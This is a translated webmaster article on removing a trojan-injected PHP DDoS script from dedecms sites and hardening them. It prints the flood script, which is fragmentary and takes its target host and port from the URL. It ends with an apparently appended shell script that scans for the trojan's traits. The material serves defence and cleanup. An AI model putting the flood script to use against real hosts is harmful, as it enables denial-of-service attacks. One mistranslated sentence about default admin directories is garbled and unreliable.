
How to fix the DDoS trojan-injection ("horse-mounting") vulnerability in dedecms

How do you fix the DDoS trojan-injection problem in dedecms?

Dedecms is a well-known open-source PHP system in China and the first-choice CMS for many webmasters building websites. Its simplicity and ease of use are a major reason for its widespread use, but precisely because dedecms is open source, many hackers have focused on it and have successively uncovered many dedecms vulnerabilities. As a result, quite a few dedecms websites have been suspended. Some have been warned by their data center, and in serious cases the data center has forcibly shut the site down, resulting in huge losses. Today we will analyze this problem in more depth and find a solution.

Characteristics of a trojan-injected site:

Open your website's homepage and view the source code: you will find that many black-link (hidden spam link) snippets have been added to your site. Black-link code is the simplest sign and the easiest for webmasters to spot. It is nothing more than the code for friendly (exchange) links.

Another sign is that when you open the website, 360 Security warns that it carries a malware risk. This kind of malicious code is usually a frame, a piece of JS, or an image tag. A further sign is that the website suddenly fails to open or opens slowly. If you check the traffic, you will find that the site is using a great deal of it: the traffic is being sent outward, which is also called a UDP packet flood attack. These are the general signs of a hacked dedecms site. Below are some practical fixes and preventive measures for a hacked website.

First, download the website's program code to your local computer and check it with the sinesafe Trojan removal tool. In this case the scan found many script trojans in the data/cache/ directory. Opening one of them showed some unfamiliar PHP code; putting that code into the sinesafe tool for deeper analysis revealed the trojan's characteristics. The code is as follows:

<?php
set_time_limit(984918);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
} // the block this brace closes is missing from the listing
echo "================================================
";
echo " <font color=blue>www.phpddos.com
";
echo " SYN Flood 模块
";
echo " 作者:ybhacker
";
echo " 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font>
";
echo "================================================
";
echo " 攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span>
</font>";
echo " 攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span>
</font>";
echo " 攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span>
</font>";
echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>

I found on the Internet that this is a PHP script trojan for UDP traffic attacks. Running with only the website script's permissions, it can carry out a DDoS traffic attack; no server permissions are required. Only then did I understand why the data center said that my website was always sending out packets. Websites running this script open slowly, mine included. Once the problem is found, it needs to be fixed quickly: click "Clear Trojan Code" to remove everything at once, after which there are no unfamiliar file names left in the data/cache/ directory. Finally, to cure this "stubborn disease", we have summarized several fixes and preventive measures:

1. Security settings of the dedecms directories: set data/cache/, templets and uploads to readable and writable but not executable. Set include, member and plus to readable and executable but not writable. Since dedecms does not use stored procedures anywhere, you can revoke FILE, EXECUTE and other database privileges that allow stored procedures or file operations.

2. Website program security: This is the most fundamental precaution. If the site runs on shared (virtual) hosting, it is recommended to have a professional handle website security maintenance to keep the website program safe. Only a safe website can bring a safe and stable source of customers.

3. Program updates: Open the dedecms backend and check whether any patches are available. If so, apply them promptly. If your version is very old, I recommend reinstalling the new version, because the new versions are relatively safe and differ from the old versions in many places.

4. Backend management directory: The dedecms backend management directory generally defaults to dedecms. Many webmasters never pay attention to this backend address. I can tell you very responsibly that if the managed directory address is the default, you will be hung up. The probability of horse is 0. It is recommended to rename the directory to a combination of numbers and letters.

5. FTP and website management passwords: It is recommended to change the FTP password and the website management password frequently, because many hackers use brute force to crack passwords. Make the passwords as complex as possible, with special symbols and letters.
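The scan of data/cache/ described before the listing and the directory rules in measure 1 can be checked together with a short script. This is an added example, not code from the original article or from dedecms: the function names, the two-trait threshold and the sample files are assumptions, and the traits are the ones visible in the listing above.

```shell
#!/bin/sh
DATA_DIRS="data/cache templets uploads"  # page: writable, must not run scripts
CODE_DIRS="include member plus"          # page: executable, must not be writable
# Traits copied from the trojan listing on this page.
TRAITS='set_time_limit|\$_GET\[.host.]|\$_GET\[.port.]|phpddos'

# Print "SUSPECT <n> <file>" for PHP files under the data directories holding
# at least two distinct traits (set_time_limit alone is common in clean code).
scan_data_dirs() {
    for d in $DATA_DIRS; do
        [ -d "$1/$d" ] || continue
        find "$1/$d" -type f -name '*.php' | sort | while IFS= read -r f; do
            n=$(( $(grep -Eoi "$TRAITS" "$f" | tr 'A-Z' 'a-z' | sort -u | wc -l) ))
            if [ "$n" -ge 2 ]; then echo "SUSPECT $n $f"; fi
        done
    done
    return 0
}

# Print "WRITABLE <path>" for anything under the code directories that is
# group- or world-writable. Assumption: files belong to a deploy account that
# is not the web server account, so these bits are what expose them.
check_code_dirs() {
    for d in $CODE_DIRS; do
        [ -d "$1/$d" ] || continue
        find "$1/$d" ! -type l \( -perm -020 -o -perm -002 \) | sort | sed 's/^/WRITABLE /'
    done
    return 0
}

# Build a small constructed web root (sample data, not real dedecms files).
make_sample() {
    r=$(mktemp -d) && mkdir -p "$r/data/cache" "$r/include" "$r/plus"
    printf '%s\n' '<?php set_time_limit(984918);' "\$host = \$_GET['host'];" \
        "\$port = \$_GET['port'];" > "$r/data/cache/t.php"
    printf '%s\n' '<?php set_time_limit(30); echo "cache";' > "$r/data/cache/ok.php"
    printf '%s\n' '<?php // constructed include file' > "$r/include/common.php"
    chmod 755 "$r/include" "$r/plus"
    chmod 666 "$r/include/common.php"
    echo "$r"
}

root=$(make_sample)
scan_data_dirs "$root"
check_code_dirs "$root"
rm -rf "$root"
```

File mode bits alone do not stop the PHP interpreter from running a .php file placed in data/cache/, so the "not executable" rule also has to be enforced in the web server configuration for those directories.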
